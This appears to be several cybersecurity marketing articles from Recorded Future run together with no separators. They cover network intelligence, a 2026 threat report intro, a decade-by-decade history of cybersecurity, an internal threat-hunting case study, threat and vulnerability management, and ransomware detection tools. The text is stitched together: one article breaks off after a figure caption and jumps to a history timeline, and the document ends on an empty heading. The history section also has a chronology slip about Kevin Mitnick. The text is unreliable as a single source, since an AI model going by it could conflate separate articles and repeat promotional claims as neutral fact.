These aren't just policies but foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.

Moving Forward

The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.

Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.

What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.

The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.

But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.

Today, Recorded Future's Insikt Group releases the 2026 State of Security report, our most comprehensive annual analysis of the forces shaping global security.

Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.

The End of Stability as a Baseline Assumption

Figure 1: 2025 redefined international relations (Source: Recorded Future)

The 1940s: Theoretical Seeds and Massive Machines

Long before the first hack, pioneers were already contemplating the risks of digital intelligence. In 1945, the Electronic Numerical Integrator and Computer (ENIAC) - the first general-purpose electronic computer - showcased the power of computing, though it was a room-sized giant reserved for military use. While the idea of a "cybercriminal" was still science fiction, the theoretical groundwork for future threats was being laid.

Mathematician John von Neumann began developing his "Theory of Self-Reproducing Automata" during this era. He proposed that a machine-based organism could replicate itself across systems - the conceptual birth of the computer virus.

Key Characteristics of This Era:

• Physical Isolation: Security meant locking the door to a room-sized machine.
• Government Monopoly: Computers were exclusive to the military and the academic elite.
• Conceptual Threats: Risks were purely mathematical theories rather than practical realities.
• The Virus Blueprint: The foundational logic for self-replicating code was established.

By understanding these early foundations, we can appreciate how a field born in the realm of theory has become the frontline of global stability.

• The ENIAC: America's Pioneering Electronic Computer
• The Life, Work, and Legacy of John von Neumann

The 1950s: Mainframes, Physical Security, and Phone Phreaking

Governments, universities, and major businesses started using large, centralized machines known as mainframes. As these computers grew more powerful, the definition of "security" still remained grounded in the physical world. During this era, data protection simply meant controlling access to the room where the hardware sat. However, a new kind of technical subculture was beginning to emerge on the fringes of the telecommunications industry.

The 1950s saw the rise of phone phreaking, where enthusiasts exploited telephone signaling frequencies to make unauthorized long-distance calls. While not yet digital hacking, this movement introduced the concept of manipulating infrastructure for unintended purposes. This culture of curiosity and boundary-pushing would eventually produce industry titans; notably, both Steve Jobs and Steve Wozniak experimented with phreaking technology before the birth of Apple.

Key Characteristics of This Era:

• Physical Perimeter: Security was defined by locks and restricted personnel access.
• Phone Phreaking: The first widespread exploitation of a technological network.
• Nascent Authentication: Password-based systems began to appear in informal, non-standardized forms.
• Fragmented Protocols: Without a connected internet, every institution developed its own isolated security rules.

These early exploits proved that even the most robust physical defenses could be bypassed by those who understood the hidden language of the systems within.

• Phone Phreaking: Hacking Before The Internet
• Year 1971: Early Days Of Phone Phreaking With Steve Wozniak & Steve Jobs

The 1960s: The First Hackers and Growing Vulnerabilities

While known primarily for its social shifts, the 1960s also marked the birth of "hacking" as a technical practice. As computers became more prevalent in universities and large institutions, a new generation of users began exploring the limits of these systems. This era shifted the focus from purely physical security to the inherent vulnerabilities within the software itself.

In 1967, IBM invited students to test a new system, only to be surprised that their probing caused system crashes and revealed weaknesses. This informal "penetration test" proved that any system accessible to users was inherently open to exploitation. It was a wake-up call that sparked the transition of cybersecurity from a passive state to an active, intellectual discipline.

Key Characteristics of This Era:

• Intentional Probing: The birth of deliberate vulnerability testing and "white hat" exploration.
• Curiosity-Driven Hacking: Hacking emerged as a way to explore system boundaries, generally motivated by academic interest rather than malice.
• Access vs. Security: Institutions realized that providing user access created inevitable security risks.
• Beyond the Lock: The realization that cybersecurity required ongoing digital strategy, not just physical barriers.

This decade transformed the computer from a mysterious black box into a challenge to be solved, proving that human ingenuity would always be the greatest threat - and defense - to any system.

• The History of Hacking
• The Evolution of Ethical Hacking: From Curiosity to Cybersecurity

The 1970s: Networking and the First "Worm"

The 1970s transformed cybersecurity from a localized concern into a networked reality. The launch of ARPANET, the precursor to the modern internet, enabled researchers to share resources across distances but also opened a doorway for autonomous software to travel between systems.

In 1971, this potential was realized with Creeper, the world's first self-replicating network program. While harmless, its ability to move across the network and display messages was a revolutionary proof of concept. In response, programmer Ray Tomlinson created Reaper - the first antivirus program - specifically designed to hunt and delete Creeper. This decade also saw the rise of Kevin Mitnick, whose exploits in the 1980s showed that psychological manipulation, or social engineering, could bypass even the strongest technical barriers.

Key Characteristics of This Era:

• Network Connectivity: ARPANET's birth created the first interconnected digital landscape.
• The First Worm: Creeper demonstrated that programs could self-propagate autonomously.
• The First Antivirus: Reaper established the "detect and delete" model of digital defense.
• Social Engineering: Early hacks highlighted that human error is often the weakest link in the security chain.

This era proved that once computers started talking to each other, the "locked door" was no longer enough to keep an intruder out.

• The Creeper Virus
• Creeper and Reaper: The First Virus and Anti-Virus

The 1980s: Personal Computers and the Birth of an Industry

The 1980s shifted computing from sterile labs to homes and offices. This explosion of connectivity via modems and floppy disks turned theoretical threats into a global reality, giving rise to the first commercial antivirus software and formal incident response teams like CERT.

Key Characteristics of This Era:

• Wild Malware: Viruses like Elk Cloner and the Brain Virus moved beyond labs to infect personal computers worldwide.
• The Morris Worm (1988): The first major network-wide disruption, leading to the first conviction under the Computer Fraud and Abuse Act (Robert Tappan Morris).
• Cyber Espionage: Marcus Hess's breach of military systems for Soviet intelligence proved that digital networks had massive geopolitical stakes.
• Ransomware Roots: The AIDS Trojan introduced the world to the concept of holding digital files hostage for payment.

The 1980s proved that as computers became personal, the threats against them became universal.

• What is Malware?
• Computer Viruses of the 80s

The 1990s: The Public Internet and Exploding Threats

As the World Wide Web went mainstream, the attack surface grew exponentially. This was the era of the "Macro Virus," where malicious code hid in everyday documents, and the dominance of Windows made it a universal target for hackers.

Key Characteristics of This Era:

• Mass-Mailers: The Melissa virus demonstrated how email could be weaponized to clog global servers in hours.
• The Encryption Standard: Netscape's SSL (1995) laid the foundation for secure online commerce and HTTPS.
• Network Fortification: Firewalls became standard equipment as businesses scrambled to block external intrusions.
• Legal Frameworks: Organizations like the EFF began fighting for digital privacy and standardized cybercrime laws.

This decade transformed cybersecurity services from a technical niche into a vital pillar of global commerce and law.

• The Melissa Virus: FAQs
• The History and Impact of Netscape's SSL

The 2000s: Professionalized Crime and Mature Defenses

The 2000s saw cybercrime scale into a high-profit industry. High-speed broadband and the rise of e-commerce meant that a single breach could compromise tens of millions of records, forcing the industry to develop more sophisticated authentication and monitoring tools.

Key Characteristics of This Era:

• Massive DDoS Attacks: "Mafiaboy" proved that even giants like Amazon and eBay could be paralyzed by flooded traffic.
• Social Engineering at Scale: The ILOVEYOU virus infected millions by exploiting human curiosity and trust.
• Data Breach Epidemics: The TJX breach accelerated the adoption of strict data security standards like PCI DSS.
• Encrypted Ransomware: In 2006, ransomware began using RSA encryption, making it nearly impossible to recover files without a key.

As attacks became more lucrative, the defensive industry responded with the first generation of modern security standards and behavioral analysis.

• 25 Years Ago: The ILOVEYOU Worm
• How a Computer Science Student Created One of the First Email Viruses That Spread by Preying on Human Nature

The 2010s: Nation-States and Digital Weapons

The 2010s shifted the focus from criminal profit to national security. Cybersecurity became a theater of war, with governments deploying digital weapons to destroy physical infrastructure and influence global politics.

Key Characteristics of This Era:

• The Stuxnet Worm: The first acknowledged cyberweapon designed to cause physical destruction to industrial equipment.
• The Snowden Leaks: Exposed the massive scale of global surveillance, sparking a decade-long debate on privacy.
• Automation and AI: Machine learning began appearing on both sides - defenders used it for detection, while attackers used it to find flaws.
• Global Ransomware: WannaCry and NotPetya showed how automated exploits could cripple hospitals and shipping lines across 150 countries.

By the end of the decade, it was clear that a line of code could be just as impactful as a physical weapon.

• Top 12 Worst Computer Viruses in History (& What They Taught Us About Cybersecurity)
• Wannacry: How the Widespread Ransomware Changed Cybersecurity

The 2020s: AI Threats and Modern Threat Intelligence

Today, the line between the physical and digital worlds has vanished. With remote work and cloud-native businesses, security is now a proactive game of "Threat Intelligence", which involves predicting and neutralizing an adversary's move before they even make it.

Key Characteristics of This Era:

• Targeting Infrastructure: Attacks on power grids and water systems have raised the stakes from financial loss to public safety.
• AI-Powered Attacks: Adversaries use AI to create deepfakes and hyper-personalized phishing at speeds humans can't match.
• Predictive Defense: Modern strategy relies on Threat Intelligence, using AI to analyze patterns and stop attacks in their tracks.
• Cloud & Remote Security: The shift away from traditional offices has forced a move toward "Zero Trust" security models.

The ongoing battle between human ingenuity and artificial intelligence now defines the frontlines of our digital existence.

• What is a "Zero Trust" Security Model?
• AI and the Future of Cybersecurity
• The Impact of AI on Cyber Threat From Now to 2027
• What Is the Future of Cybersecurity?

• Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.
• Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.
• Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.
• During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.
• A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.

Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team

The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.

That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.

The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.

The challenge: Inconsistent and analyst-dependent threat hunting

Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."

This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.

The transformation: Unified, repeatable threat hunting

Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."

The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."

Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."

Real-world impact: Upskilling junior analysts and enabling rapid response

According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.

First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.

Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.

Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."

Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.

That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.

The advantage of a single pane of glass

Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."

This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.

Why the Customer Zero experience matters

Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.

Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."

We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.

Learn more about Autonomous Threat Operations by clicking here, or start operationalizing your threat intelligence now by booking a custom demo.

• Traditional vulnerability management tools can no longer keep up with the speed of modern exploitation—threat context is now mandatory.
• Threat and Vulnerability Management (TVM) systems unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.
• Static CVSS scores fail to reflect exploitation likelihood; intelligence-driven, dynamic risk scoring is essential in 2026.
• Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste, enhancing detection and remediation while reducing alert fatigue.

Why Threat and Vulnerability Management Must Evolve in 2026

Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.

Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.

Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.

In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using intelligence-driven TVM systems.

The Core Problem: Alert Fatigue and Prioritization Failure

As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.

Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these challenges of prioritization. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.

However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:

• Is exploit code available?
• Is the vulnerability actively exploited?
• Are threat actors discussing or operationalizing it?

As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.

At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.

Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:

• Operational drag and burnout
• Delayed remediation of truly dangerous vulnerabilities
• Increased business risk despite increased effort
• Fractured security operations

Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.

The Evolving Threat Landscape Demands a New Approach

Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.

Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.

At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an integrated approach between the two.

In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.

What Is Threat and Vulnerability Management (TVM)?

Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:

• Active exploitation
• Threat actor behavior
• Asset criticality

TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.

This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.

The Five Core Pillars of Modern TVM Systems

As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.

1. Continuous Asset Discovery & Inventory

Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.

Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.

2. Vulnerability Assessment & Scoring

TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.

3. External Threat Context Enrichment

This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.

Vulnerabilities are mapped to known threat actors, active exploitation, and MITRE ATT&CK® techniques, ultimately transforming raw findings into actionable intelligence.

4. Risk-Based Prioritization (RBVM)

Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.

5. Automated Remediation & Verification

Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.

These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.

Stop Patching Everything — Use Intelligence to Prioritize Real Risk

The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.

Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.

Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.

The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.

See Your Risk Like an Attacker: The Full Attack Surface View

In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.

1. The Visibility Gap: Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.
2. Attack Surface Intelligence Explained: Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.
3. Connecting the Dots with Vulnerability Tools: When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.

Three Strategic Recommendations for Security Leaders

Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.

1. Bridge the Gap Between Security and IT

Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.

2. Embrace Automation and Workflow Integration

Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.

3. Measure What Matters — Time-to-Remediate (TTR)

Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.

The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy

Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.

Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.

Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.

By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.

• Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.
• The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.
• Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.
• Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.

Introduction

The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.

The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the 2025 Verizon Data Breach Investigations Report. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.

This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).

The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.

The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.

The Ransomware Detection Tool Landscape: Three Pillars of Defense

Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.

1. Endpoint and Extended Detection and Response (EDR/XDR) Tools

EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.

Core Functionality

EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.

How Threat Intelligence Enhances EDR/XDR

Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.

Example Tools

• CrowdStrike Falcon delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.
• Microsoft Defender XDR integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.
• SentinelOne employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.

2. Network Detection and Response (NDR) Tools

While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.

Core Functionality

NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.

How Threat Intelligence Improves NDR and Deception

Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.

Example Tools

• Vectra AI specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.
• ExtraHop Reveal(x) provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.
• Illusive (now part of Zscaler) deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.

3. Threat Intelligence Tools

The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.

Core Functionality

Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.

How Threat Intelligence Strengthens Ransomware Detection

These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:

• Threat Mapping: Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.
• Infrastructure Tracking: Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.
• Variant Identification: Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.
• Exploitation Intelligence: Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.
• Risk Scoring: Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.

Example Tools

• Recorded Future delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.
• Flashpoint specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.
• Google Threat Intelligence (formerly Mandiant) combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.

Choosing the Right Ransomware Detection Tools

Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.

Security leaders should prioritize:

• Pre-encryption visibility: Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.
• Context-rich alerts: Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.
• Integration maturity: Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.
• Operational efficiency: Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.
• Relevance: Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.
• Scalability: Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.

How Recorded Future Enables Early Ransomware Detection

